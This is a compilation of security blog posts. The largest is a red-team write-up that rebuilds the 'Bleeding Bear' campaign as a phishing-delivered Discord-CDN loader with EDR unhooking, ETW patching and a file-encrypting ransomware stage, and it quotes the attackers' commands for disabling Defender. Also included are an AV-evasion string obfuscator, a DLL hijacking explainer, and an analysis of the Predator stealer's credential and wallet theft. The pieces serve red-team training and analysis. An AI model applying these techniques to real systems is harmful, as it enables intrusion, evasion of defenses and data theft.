Reading Time: 9 minutes Ransomware Details Phobos ransomware, first discovered in December 2018, is another notorious cyber threat that targets businesses. Phobos is popular among threat actors of various technical abilities because of its simple design. In addition, the Greek god Phobos was thought to be the incarnation of fear and panic; hence the name Phobos was likely inspired […]

Repurposing Real TTPs for use on Red Team Engagements

I recently read an interesting article by Elastic. It provides new analysis of a sophisticated, targeted campaign against several organizations. This has been labelled ‘Bleeding Bear’. The articles analysis of Bleeding Bear tactics, techniques and procedures left me with a couple of thoughts. The first was, “hey, I can probably perform some of these techniques!” and the second was, “how can I improve on them?”

With that in mind, I decided to create a proof of concept for elements of Operation Bleeding Bear TTPs. This is not an exact replica, or even an attempt to be an exact replica, because I found a lot of the actions the threat actors were performing were unnecessary for my objectives. I dub this altered set of techniques BreadBear.

Where there are changes, I’ll point them out along with the reasons for them. To help you to follow along with this blog post, I have posted the code to my GitHub repository, which you are welcome to download, examine, and run. This post will be separated into three distinct sections which will mark each stage of the campaign; initial payload delivery, payload execution, and finally document encryption.

Stage 1 – Initial Payload and Delivery

The first section of the Bleeding Bear campaign is described as a WhisperGate MBR wiper. Essentially, this technique will make any machine affected unbootable on the next boot operation. The attackers replace the contents of the MBR with a message that usually says something along the lines of “To get your data back, send crypto currency to xyz address”. I didn’t implement this because it’s a proof of concept and I didn’t want to wreck my development VM 100 times to test this out.

Instead, I created a stage 1 as a fake phishing scenario to be the initial delivery of the payload. The payload itself is delivered via a static webpage that upon loading will execute JavaScript to automatically download the stage 2 payload. However, it’s up to the end user to click past a few different warnings to run the executable. I’d like to mention that initial payload delivery is probably my weakest point in all of this, so if you’re reading this and can think of a million ways to improve upon this technique, please reach out to me on twitter or LinkedIn with recommendations.

The initial payload delivery is facilitated by a static web page with some JavaScript that has the user automatically download the targeted file upon loading of the page. The webpage itself is hosted by IPFS (Inter-Planetary File System). Once you have IPFS installed on your system, all you need to do is import your web-pages root folder to IPFS and retrieve the URL to your files. This process is very simple and looks as follows.

Once IPFS is installed, first hit Import, then Folder.

Graphical user interface, text, application, Teams Description automatically generated

Next, when the browser window opens, you’ll want to browse to your static webpages root folder. A sample provided by Black Hills Information Security is included in the GitHub repo under x64/release. With tools like zphisher you can create your own, more complex, phishing sites.

Once your folder has been imported, your files will be shared via the IPFS peer-to-peer network. Additionally, they will be reachable from a common gateway that you can set in your IPFS settings. IPFS has a list of gateways that can be used, located on this site. However, to retrieve the URL that can access your files you’ll want to right click on the folder, click share link, and then copy.

Graphical user interface, application, Word Description automatically generated

Graphical user interface, application Description automatically generated

Then, all you need to do is distribute this link with the proper context for your target. When the user clicks your link, they’ll be presented with the following page:

Graphical user interface, application, Word Description automatically generated

On Chrome, if they press keep, the file finishes the download and is ready for execution. The JavaScript code that performs the automatic download to force Chrome to ask to keep the file is shown below:

Text Description automatically generated

An element variable is initialized to the download href tag. Then, we set the element to our executable file named MicrosoftUpdater.exe. Finally, we click the element programmatically which starts the download process. For more information about how IPFS can be used as a malware hosting service, read this blog by Steve Borosh who was the inspiration of the initial payload delivery.

Stage 2 – Payload Execution

Once the user has been successfully phished, phase 1 has been completed and we transition into phase 2, with the execution of stage2.exe or, in this case, the MicrosoftUpdater.exe program. In the Bleeding Bear campaign, the heavy lifting is performed by the stage2.exe binary, which uses Discord to download and execute malicious programs. My stage 2 binary also utilizes the Discord CDN to download, reflectively load, and execute stage 3. However, that’s pretty much where the comparison stops.

The stage 2 Discord downloader in the Bleeding Bear campaign downloads an obfuscated .NET assembly and uses reflection to load it. However, mine is a compiled PE binary. Additionally, the Bleeding Bear campaign performs a lot of operations which require either a UAC bypass or a UAC accept from the user to perform. These actions include writing a VBScript payload to disk which will set a Defender exclusion path on the C drive.
"C:\Windows\System32\WScript.exe""C:\Users\jim\AppData\Local\Temp\Nmddfrqqrbyjeygggda.vbs"
powershell.exe Set-MpPreference -ExclusionPath 'C:\'

Then the payload will download and run AdvancedRun in a higher integrity to stop Windows Defender and delete all files in the Windows Defender directory.

"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" `
/WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" `
/EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 `
/CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" `
/StartDirectory "" /RunAs 8 /Run

Next, InstallUtil.exe is downloaded to the user’s Temp directory. The InstallUtil program is used for process hollowing. This means that the executable is started in a suspended state, then the memory of the process is overwritten with a malicious payload which is then executed instead. To the computer, it will look like InstallUtil is running, however, it is actually the payload. In the Bleeding Bear campaign, that malicious payload happens to be a File Corruptor, which overwrites 1MB of the byte 0xCC over all files that end with the following extensions:

.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

I found a lot of these steps to be unnecessary; therefore, I did not perform them. I wanted to leave as minimal trace on the system as possible. I also didn’t see a need for a high integrity process to be spawned to perform ancillary functions, such as deleting Windows Defender, when we can just bypass it. However, my stage 2 code does contain a failed UAC bypass even though it is not used.

The differences between my stage 2/3 will become apparent as we walk through the code. Before we start walking through the code, I’d like to mention the features of my stage 2 so that when you see auxiliary function names through the code – it’ll make sense. My stage 2 does the following:

  • Dynamically retrieves function pointers to any Windows APIs used maliciously
    • Has a custom GetProcAddress() & GetModuleHandle() implementation to retrieve function calls
    • Custom LoadLibrary() function that will dynamically retrieve the pointer to LoadLibraryW() at each run.
  • Hides the console window at startup.
  • Has a self-delete function which will delete the file on disk at runtime once the PE has been loaded into memory and executed.
  • Unhooks DLLs using the system calls for native windows APIs (using the Halo’s Gate technique).
  • Disables Event Tracing for Windows (ETW).
  • Uses a simple XOR decrypt function to decrypt strings such as Discord CDN URLs at runtime.
  • Performs a web request to Discord CDN using Windows APIs to retrieve stage3 in a base64 encoded format.
  • Reflectively loads a stage 3 payload in memory and executes.
  • Lazy attempts at string obfuscation.

With that said, I will only cover techniques I found particularly interesting or important in this blog post for brevity.

A picture containing text Description automatically generated

First, we see a dynamically resolved ShowWindow() used to hide the window. Next, we see SelfDelete() which will delete itself from disk even if the executable is running still. I believe this function is a neat trick and worth going over.

A picture containing text Description automatically generated

First, we dynamically resolve pointers to the Windows APIs CloseHandle(), SetFileInformationByHandle(), CreateFileW(), and GetModuleFileNameW(). Following that we create some variables to store necessary information.

Text Description automatically generated

Next, we resolve the path that our stage 2 is downloaded to disk using GetModuleFileNameW(). We then obtain a handle to stage 2 using CreateFileW() and the OPEN_EXISTING flag. We create a FILE_RENAME_INFO structure and populate its contents with the rename string “:breadman” and a flag to replace the file if it exists already. We make a call to setFileInformationByHandle() using our file handle, our rename information structure, and the FileRenameInfo() flag. This renaming of the file handle will allow us to delete the file on disk. This is because the file lock occurs on the renamed file handle. We can then reopen a file handle to the original file on disk and delete it. Thus, we close our handle and reopen it using the original filename path. After, we call SetFileInformationByHandle() again with a File Disposition Info structure and the DeleteFileW() flag set to true. Finally, we close our file handle, which will cause the file to be deleted from disk and we continue our code execution back in main.

With that done, we perform the unhooking of our DLLs using System Calls and Native APIs to bypass AV/EDR hooking. I won’t cover this in depth, however, the same exact code is used in another of my blog posts.

The next important functions in main() are disabling event tracing for windows and decrypting the encrypted Discord CDN strings.

Text Description automatically generated

The disabling of event tracing for windows is simple (function template credits to Sektor7 institute):

Text Description automatically generated

First, we obtain a handle to the function EventWrite() in the NTDLL.dll library. Then we change the memory protections of a single page to execute+read+write, copy in the byte equivalent to xor rax,rax ; ret at the first four bytes. This will eventually set the return value of the function to zero (probably indicating success) and then returning. The function essentially returns without performing any actions, and therefore disables event tracing for windows.

I won’t go over the XOR decryption since it’s a rudimentary technique. However, I will go over how you can use Discord CDN as a MDN ‘Malware Distribution Network’.

In Discord, anyone can create their own private server to upload files, messages, pictures, etc. to. However, access to anything uploaded, even to a private server, does not require authentication. One caveat to keep in mind, however, is that executables need to be converted to a base64 string. When I downloaded them manually from the CDN, I ran into problems (likely compression) where the size was smaller when I downloaded it using APIs. The same problem did not occur with text files. Therefore, I put the base64 encoded PE file into a text file and downloaded that instead. This looks like the following:

Graphical user interface, text, application Description automatically generated

Once you’ve uploaded the file, you can right click the download link at the bottom of the above screenshot, then select Copy Link.

Graphical user interface, text, application, website Description automatically generated

Once that has been completed, you have your Discord CDN URL that is accessible from anywhere in the world without authentication. Additionally, these URLs are valid forever even if the file has been deleted from the server.

It’s as simple as that. Obviously, there might be some red team infrastructure you’d want to standup in-between the CDN and the target host to redirect any potential security analysts who go snooping, but it’s an effective method for serving up malware.

Next, to finish up main(), we perform the following tasks. We first parse our Discord CDN URL that was just decrypted into separate parts. Then we perform a request to download our targeted file by calling the do_request() function using the parsed URL pieces.

Text Description automatically generated

We open the do_request() function by dynamically resolving pointers to any Windows APIs we will use to perform the HTTPS request to Discord. We then follow that up by initializing variables we’re going to use as parameters to the following WinInet function calls.

Graphical user interface, text Description automatically generated

There aren’t too many interesting pieces of information regarding our Internet API calls, aside from the InternetOpenA() and the HttpOpenRequestA() calls. For the first, we specify INTERNET_OPEN_TYPE_DIRECT to ensure that there is no proxy. We can put default options here to specify the default system proxy settings. Additionally, for HttpOpenRequestA() we specify the INTERNET_FLAG_NO_CACHE_WRITE flag to ensure the call doesn’t cache the file download in the %LocalAppData%\Microsoft\Windows\INetCache. Next, we make a call to HttpQueryInfoA() with the HTTP_QUERY_CUSTOM flag. This ensures that we can receive the value of a custom HTTP Response header that we got back when we made our HTTP request. The specified custom query header is passed to do_request() from main and is the content length header. We will use this value to allocate memory for our stage 3 payload that was just downloaded.

Text Description automatically generated

We now allocate memory for our downloaded file using malloc() and the size of our content length value. Following that, we make a call to InternetReadFile() function to load the base64 encoded data into our allocated memory space. Once it has been successfully loaded, we make a call to pCryptStringToBinaryW(), which will convert our base64 encoded data into the byte code that makes up our stage 3 payload. We then free the allocated memory region and call the final function of do_request() which is reflectiveLoader().

Text Description automatically generated

I won’t go over the reflective loading / execution of our PE File in memory because I’ve written a previous blog post about it already. However, I used the code from this resource as the base of my loader.

Stage 3 – File Corruptor

Stage 3 probably has the biggest differences in functionality from the Bleeding Bear campaign. The stage 3 of the Bleeding Bear campaign is a “File Corruptor”, and not an encryption scheme. What this means is that the Bleeding Bear campaign’s third stage will overwrite the first 1mb of data of all files it finds on disk that are not critical to system operation. If the file is smaller than 1mb of data, it will overwrite the whole file and add the difference to make a 1mb file. As far as I know, the campaign does not download the unaffected files before overwriting, therefore all data will be lost. This file corruptor is also not a reflectively loaded PE file. Instead, the file corruptor is likely a piece of shellcode that is executed via a process hollowing technique. The stage 2 of the Bleeding Bear campaign downloads InstallUtil.exe to disk, executes it in a suspended state, overwrites the process memory to the corruptor shellcode, and then resumes the process execution.

The BreadBear technique uses a file encryptor rather than a corruptor. I decided to use an encryptor because eventually I plan to add the functionality of downloading the unencrypted data, the keys used to encrypt the file, and to add a decryption function. I believe this would be beneficial to clients who want to test against a simulated ransomware campaign. Additionally, since I am reflectively loading the stage 3 executable in memory, there’s no need to perform process hollowing, or even writing the InstallUtil binary to disk. I believe my approach is more operationally secure than the Bleeding Bear’s alternative.

Additionally, with my approach you can swap out your stage 3 from file encryptor to implant shellcode. I have successfully tested my stage 3 payload with the binary from my previous blog post BreadMan Module Stomping. The only requirement for the reflective loading is that the file chosen is compiled in a valid PE format.

With that being said, let’s dive into stage 3: the file encryptor.

I would like to note that no attempts at obfuscation or evasion were made in the stage 3 payload. This is because it is being loaded into a process memory space that was unhooked from AV/EDR, and ETW patching have already occurred, so it is not needed.

Text Description automatically generated

In main(), all we do is call the encryptDirectory() function with the argument of our target directory. Note, that since this is a proof of concept, I did not implement functionality to encrypt entire drives.

encryptDirectory() starts by initializing a variable to hold a new directory path called tmpDirectory(). We add the portion “\\*” to our target directory which will indicate we want to retrieve all files. Then, we initialize a WIN32_FIND_DATAW and a file handle variable.

Text Description automatically generated

Next, we call FindFirstFileW() using the target directory and our FIND_DATAW variables as parameters. Then, we create a linked list of directories.

To follow that up, we enter a do-while loop, which continues while we have more directories or files to encrypt in our current directory. We initialize two more file directory path variables. The tmp2 variable stores the name of the next file/directory we need to traverse/encrypt, and the tmp3 variable stores the randomized encrypted file name after the file has been encrypted. Next, we check if the object we obtained a handle to is a directory and if it is the current or previous directory, ‘.’, or ‘..’. If it is, we skip them.

If it’s any other directory, we append the name of that directory to the current directory, add it as a node to our linked list, and continue. If it’s a file, we generate a random string, append that string to the current directory path, and call encryptFile(). This function takes the following parameters: the full path to the unencrypted file, the full path name of the encrypted file, and the password used to encrypt. We then call DeleteFile() on the unencrypted file. Finally, we obtain a handle to the next file in the folder.

Text Description automatically generated

To finish the function off, we recursively call encryptDirectory() until there are no more folders in the linked list of folders we identified.

Text Description automatically generated

I won’t dive too deep into the file encryption function for two reasons. First, I am not a big cryptography guy. I don’t know much about it, and I don’t want to give any false information. Second, I took this proof of concept and just implemented it in C instead of CPP.

However, the important part I’d like to highlight is that I used the same determination scheme the Bleeding Bear campaign uses to ascertain if a file should be corrupted or not. BreadBear and Bleeding Bear both use the following file extension list to determine if a file should be altered:

Text Description automatically generated

Conclusion

With BreadBear, I took an analysis of a real threat actors TTPs and created a working proof of concept, which I believe improves upon some of their tooling. This work can help organizations visualize how a campaign can be easily created and defend accordingly. More importantly, it was an educational exercise. Feel free to contribute to the code base over on GitHub.

The post Repurposing Real TTPs for use on Red Team Engagements appeared first on Nettitude Labs.

Obfuscated String/Shellcode Generator - Online Tool



String Shellcode |

Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");

See also: Overflow Exploit Pattern Generator - Online Tool.

About this tool

I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do this similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Overflow Exploit Pattern Generator - Online Tool

Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

Generate Overflow Pattern


Find Overflow Offset

For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept. You crash the program, and see what the value of your instruction pointer register is. You type that value in to find the offset of how big your buffer should be overflowed before you hijack execution.

See also: Obfuscated String/Shellcode Generator - Online Tool

Top Security QuickFails: #5 Angriff der KlonAdmins aka Missing LAPS

#5 Angriff der KlonAdmins aka Missing LAPS Der Angriff In der FaulerHund AG in München starten die Mitarbeiter in ein neues Geschäftsjahr und freuen sich auf neue Herausforderungen. So auch der Administrator Karl KannNixDafür, welcher am Donnerstag Mittag gegen 12:30 festgestellt hat, dass der Account von Ute Unbeschwert noch angemeldet ist, obwohl diese gegen 11 […]

The DLL Search Order And Hijacking It

If you ever used Process Monitor to track activity of a process, you might have encountered the following pattern:

Figure 1: Example of dnsapi.dll not being found in the application directory

The image above is a snippet from events captured by Process Monitor during the execution of x32dbg.exe on Windows 7. DNSAPI.DLL and IPHLPPAPI.DLL are persisted in the System directory, so you might question yourself:

Why would Windows try to search for either of these DLLs in the application directory first?

Operating Systems are very complex and so is the challenge of implementing an error-fault system to search for dependencies, like dynamic linked libraries. Today, we’ll talk about DLL Search Order and DLL Search Order Hijacking, in particular how it works and how adversaries can abuse it.

DLL Search Order

First, we have to talk about what happens when a PE File is executed on the Windows system.

The majority of native binaries you encounter on Windows are linked dynamically. Linked dynamically means that upon start of the execution, it uses information which are embedded inside the binary to locate DLLs that are essential for this process. In comparison with statically linked binaries, when linked dynamically the executable will use the libraries provided by the OS instead of having them compiled into the executable itself.

Before the dynamically linked executable can use or load these libraries, it will have to know where these dependencies are persisted on disk or if they are already in memory. This is where the DLL Search Order makes its appearance. To keep it simple, we will focus only on Windows Desktop Applications.

Pre-Checks and In-Memory Search

Before the Windows OS starts searching for the needed DLL on disk, it will first attempt to find the needed module in memory. If a DLL is already in memory, it will not loaded it again. Now this part is a little bit complicated and out of context for this blog article, we would have to define what “loaded” even means. If you are more interested in the first check, I advise you to look up the official Microsoft documentation[1].

If the memory check fails, Windows can fall back to using a list of known DLLs. if the needed library is part of that list, it will use the copy of the known DLL. The list of known DLLs are persisted in the Windows Registry.

Figure 2: List of KnownDlls on Windows 7

On-Disk Search

If the first two checks fail, the OS will have to search for the DLL on disk. Depending on the OS Settings, Windows will use a different search order. Per default, Windows enables the DLL Search Mode feature to harden the system and prevent DLL Search Order Hijacking attacks, a technique we will explain in the upcoming section.

The key to the feature is as follows:

  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

Let’s take a look at the differences of the search order depending whether SafeDllSearchMode is enabled or not.

Figure 3: DLL Search Order flow

We clearly see that the current directory is prioritised if SafeDllSearchMode is disabled and this can be abused by adversaries. The art of abusing this search order flow is called DLL Search Order Hijacking.

DLL Search Order Hijacking

Adversaries can abuse the search order flow displayed above to load their own malicious DLLs instead of the legitimate ones into memory. There are many ways this technique can be used. However, it is more effective in achieving persistence on the target system then initial execution.

Let’s take a step back and revisit our example from above:

  • x32dbg.exe tries to load DNSAPI.DLL
  • DNSAPI.DLL is not in the list of known DLLs and is also not loaded into memory.
  • Since SafeDllSearchMode is enabled, it will fall back to the system directory if not found in the application directory

What would happen, if we craft and place a malicious DLL, named DNSAPI.DLL into the application directory?

We would be able to hijack the search order flow and force a legitimate application to load our malicious code into memory.

Practical Use Case

Let’s take a look at a simple practical example. Our application calls LoadLibraryA and tries to load dnsapi.dll like in our example from above. Next we craft a small DLL file, which does nothing else but create a message box in the DLLMain function. Once the DLL is loaded into memory, the main function will be triggered.

In the first run, we do not place the crafted DLL in the application directory. As expected, Windows will load dnsapi.dll from the system directory:

Next, we will now name our crafted DLL dnsapi.dll and place it in the application directory:

Whoops! I think we can all think of a couple use cases of how APT groups and malware can abuse this technique to achieve persistence on the victim’s system.

Real world examples and APTs

For the sake of keeping it simple and explaining the core principles behind this persistence technique, we’ve build a very simple use case here. Of course, the real world looks a little bit different and usually attackers have to take into account:

  • Endpoint Security solutions with behaviour based detections, preventing such attacks with signatures
  • Programmatic dependencies, which won’t allow you to just replace a DLL in an application directory and hope that it will work just fine
  • and many more

However, if you never heard about this technique, I hope I was able to create some awareness for it!

Predator The Thief: In-depth analysis (v2.3.5)

By: fumko

Well, it’s been a long time without some fresh new contents on my blog. I had some unexpected problems that kept me away from here and a lot of work (like my tracker) that explain this. But it’s time to come back (slowly) with some stuff.

So today, this is an In-Depth analysis of one stealer: “Predator the thief”, written in C/C++. Like dozen others malware, it’s a ready to sell malware delivered as a builder & C2 panel package.

The goal is to explain step by step how this malware is working with a lot of extra explanations for some parts. This post is mainly addressed for junior reverse engineers or malware analysts who want for future purposes to understand and defeat some techniques/tricks easily.

So here we go!

Classical life cycle

The execution order is almost the same, for most of the stealers nowadays. Changes are mostly varying between evading techniques and how they interact with the C2.  For example, with Predator, the set up is quite simple but could vary if the attacker set up a loader on his C2.

Diagram

The life cycle of Predator the thief

Preparing the field

Before stealing sensitive data, Predator starts by setting up some basics stuff to be able to work correctly. Almost all the configuration is loaded into memory step by step.

EntryPoint

So let’s put a breakpoint at “0x00472866” and inspect the code…

Call_Setup

  1. EBX is set to be the length of our loop (in our case here, it will be 0x0F)
  2. ESI have all functions addresses storedESI_Addresses
  3. EAX, will grab one address from ESI and moves it into EBP-8
  4. EBP is called, so at this point, a config function will unpack some data and saved it into the stack)
  5. ESI position is now advanced by 4
  6. EDI is incremented until reaching the same value as stored EBX
  7. When the EDI == EBX, it means that all required configuration values are stored into the stack. The main part of the malware could start

So, for example, let’s see what we have  inside 0040101D at 0x00488278

So with x32dbg, let’s see what we have… with a simple command

Command: go 0x0040101D

As you can see, this is where the C2 is stored, uncovered and saved into the stack.

C2

So what values are stored with this technique?

  • C2 Domain
  • %APPDATA% Folder
  • Predator Folder
  • temporary name of the archive predator file and position
  • also, the name of the archive when it will send to the C2
  • etc…

With the help of the %APPDATA%/Roaming path, the Predator folder is created (\ptst). Something notable with this is that it’s hardcoded behind a Xor string and not generated randomly. By pure speculation, It could be a shortcut for “Predator The STealer”.

This is also the same constatation for the name of the temporary archive file during the stealing process: “zpar.zip”.

The welcome message…

When you are positioned at the main module of the stealer, a lovely text looped over 0x06400000 times is addressed for people who want to reverse it.

welcome

Obfuscation Techniques

The thief who loves XOR (a little bit too much…)

Almost all the strings from this stealer sample are XORed, even if this obfuscation technique is really easy to understand and one of the easier to decrypt. Here, its used at multiple forms just to slow down the analysis.

GetProcAddress Alternatives

For avoiding to call directly modules from different libraries, it uses some classic stuff to search step by step a specific API request and stores it into a register. It permits to hide the direct call of the module into a simple register call.

So firstly,  a XORed string (a DLL) is decrypted.  So for this case, the kernel32.dll is required for the specific module that the malware wants to call.

Step_1_API

When the decryption is done, this library is loaded with the help of “LoadLibraryA“. Then, a clear text is pushed into EDX: “CreateDirectoryA“… This will be the module that the stealer wants to use.

The only thing that it needs now, its to retrieve the address of an exported function “CreateDirectoryA” from kernel32.dll. Usually, this is done with the help of GetProcAddress but this function is in fact not called and another trick is used to get the right value.

Step_2_API

So this string and the IMAGE_DOS_HEADER of kernel32.dll are sent into “func_GetProcesAddress_0”. The idea is to get manually the pointer of the function address that we want with the help of the Export Table. So let’s see what we have in the in it…

struct IMAGE_EXPORT_DIRECTORY {
	long Characteristics;
	long TimeDateStamp;
	short MajorVersion;
	short MinorVersion;
	long Name;
	long Base;
	long NumberOfFunctions;
	long NumberOfNames;
	long *AddressOfFunctions;    <= This good boy
	long *AddressOfNames;        <= This good boy 
	long *AddressOfNameOrdinals; <= This good boy
}

After inspecting the structure de IMAGE_EXPORT_DIRECTORY, three fields are mandatory :

  • AddressOfFunctions – An Array who contains the relative value address (RVA) of the functions of the module.
  • AddressOfNames – An array who stores with the ascending order of all functions from this module.
  • AddressOfNamesOrdinals – An 16 bits array who contains all the associated ordinals of functions names based on the AddressOfNames.

source

So after saving the absolute position of these 3 arrays, the loop is simple

Function_Get

  1. Grab the RVA of one function
  2. Get the name of this function
  3. Compare the string with the desired one.

So let’s see in details to understand everything :

If we dig into ds:[eax+edx*4], this where is stored all relative value address of the kernel32.dll export table functions.

RVA
With the next instruction add eax,ecx. This remains to go at the exact position of the string value in the “AddressOfNames” array.

DLLBaseAddress + AddressOfNameRVA[i] = Function Name 
   751F0000    +       0C41D4        = CreateDirectoryA

Address of names

The comparison is matching,  now it needs to store the “procAddress.  So First the Ordinal Number of the function is saved. Then with the help of this value, the Function Address position is grabbed and saved into ESI.

ADD           ESI, ECX
ProcAddress = Function Address + DLLBaseAddress

In disassembly, it looks like this :

GetProcAddress

Let’s inspect the code at the specific procAddress…

Check_01

Step_END_API

So everything is done, the address of the function is now stored into EAX and it only needs now to be called.

Anti-VM Technique

Here is used a simple Anti-VM Technique to check if this stealer is launched on a virtual machine. This is also the only Anti-Detection trick used on Predator.

Anti_VM_01

First, User32.dll (Xored) is dynamically loaded with the help of “LoadLibraryA“, Then “EnumDisplayDevicesA” module is requested with the help of User32.dll. The idea here is to get the value of the “Device Description” of the current display used.

When it’s done, the result is checked with some values (obviously xored too) :

  • Hyper-V
  • VMware
  • VirtualBox

regedit_hyperv

If the string matches, you are redirected to a function renamed here “func_VmDetectedGoodBye.

How to By-Pass this Anti-VM technique?

For avoiding this simple trick, the goal is to modify the REG_SZ value of “DriverDesc” into {4d36e968-e325-11ce-bfc1-08002be10318} to something else.

regedit_bypass

And voilà!

Troll

Stealing Part

Let’s talk about the main subject… How this stealer is organized… As far I disassemble the code, this is all the folders that the malware is setting on the “ptst” repository before sending it as an archive on the C2.

  • Folder
    • Files: Contains all classical text/documents files at specifics paths
    • FileZilla: Grab one or two files from this FTP
    • WinFTP: Grab one file from this FTP
    • Cookies: Saved stolen cookies from different browsers
    • General: Generic Data
    • Steam: Steal login account data
    • Discord: Steal login account data
  • Files
    • Information.log
    • Screenshot.jpeg <= Screenshot of the current screen

Telegram

For checking if Telegram is installed on the machine, the malware is checking if the KeyPath “Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1” exists on the machine.

So let’s inspect what we have inside this “KeyPath”? After digging into the code, the stealer will request the value of “InstallLocation” because of this where Telegram is installed currently on the machine.

Install

Step by step, the path is recreated (also always, all strings are xored) :

  • %TELEGRAM_PATH%
  • \Telegram Desktop
  • \tdata
  • \D877F783D5D3EF8C

map file

The folder “D877F783D5D3EF8C” is where all Telegram cache is stored. This is the sensitive data that the stealer wants to grab. Also during the process, the file map* (i.e: map1) is also checked and this file is, in fact, the encryption key. So if someone grabs everything for this folder, this leads the attacker to have an access (login without prompt) into the victim account.

Steam

The technique used by the stealer to get information for one software will remain the same for the next events (for most of the cases). This greatly facilitates the understanding of this malware.

So first, it’s checking the “SteamPath” key value at “HKCU\Software\Valve\Steam” to grab the correct Steam repository. This value is after concatenating with a bunch of files that are necessary to compromise a Steam Account.

So it will check first if ssfn files are present on the machine with the help of “func_FindFiles”, if it matches, they are duplicated into the temporary malware folder stored on %APPDATA%/XXXX. Then do the same things with config.vdf

XOR_3

So what the point with these files? First, after some research, a post on Reddit was quite interesting. it explained that ssfn files permit to by-pass SteamGuard during the user log-on.

Steam

Now what the point of the second file? this is where you could know some information about the user account and all the applications that are installed on the machine. Also, if the ConnectCache field is found on this one, it is possible to log into the stolen account without steam authentication prompt. if you are curious, this pattern is represented just like this :

"ConnectCache"
{
       "STEAM_USERNAME_IN_CRC32_FORMAT" "SOME_HEX_STUFF"
}

The last file, that the stealer wants to grab is “loginusers.vdf”. This one could be used for multiple purposes but mainly for setting the account in offline mode manually.

XOR_4

For more details on the subject there a nice report made by Kapersky for this:

Wallets

The stealer is supporting multiple digital wallets such as :

  • Ethereum
  • Multibit
  • Electrum
  • Armory
  • Bytecoin
  • Bitcoin
  • Etc…

The functionality is rudimentary but it’s enough to grab specific files such as :

  • *.wallet
  • *.dat

And as usual, all the strings are XORed.

Wallet

FTP software

The stealer supports two FTP software :

  • Filezilla
  • WInFTP

It’s really rudimentary because he only search for three files, and they are available a simple copy to the predator is done :

  • %APPDATA%\Filezilla\sitemanager.xml
  • %APPDATA%\Filezilla\recentservers.xml
  • %PROGRAMFILES%\WinFtp Client\Favorites.dat

Browsers

It’s not necessary to have some deeper explanation about what kind of file the stealer will focus on browsers. There is currently a dozen articles that explain how this kind of malware manages to steal web data. I recommend you to read this article made by @coldshell about an example of overview and well detailed.

As usual, popular Chrome-based & Firefox-based browsers and also Opera are mainly targeted by Predator.

This is the current official list supported by this stealer :

  • Amigo
  • BlackHawk
  • Chromium
  • Comodo Dragon
  • Cyberfox
  • Epic Privacy Browser
  • Google Chrome
  • IceCat
  • K-Meleon
  • Kometa
  • Maxthon5
  • Mozilla Firefox
  • Nichrome
  • Opera
  • Orbitum
  • Pale Moon
  • Sputnik
  • Torch
  • Vivaldi
  • Waterfox
  • Etc…

This one is also using SQLite for extracting data from browsers and using and saved them into a temporary file name “vlmi{lulz}yg.col”.

sqlite

So the task is simple :

  • Stole SQL Browser file
  • Extract data with the help of SQLite and put into a temporary file
  • Then read and save it into a text file with a specific name (for each browser).

cookies

When forms data or credentials are found they’re saved into two files on the General repository :

  • forms.log
  • password.log
  • cards.log

General

Discord

If discord is detected on the machine, the stealer will search and copy the “https_discordapp_*localstorage” file into the “ptst” folder. This file contains all sensitive information about the account and could permit some authentication without a prompt login if this one is pushed into the correct directory of the attacker machine.

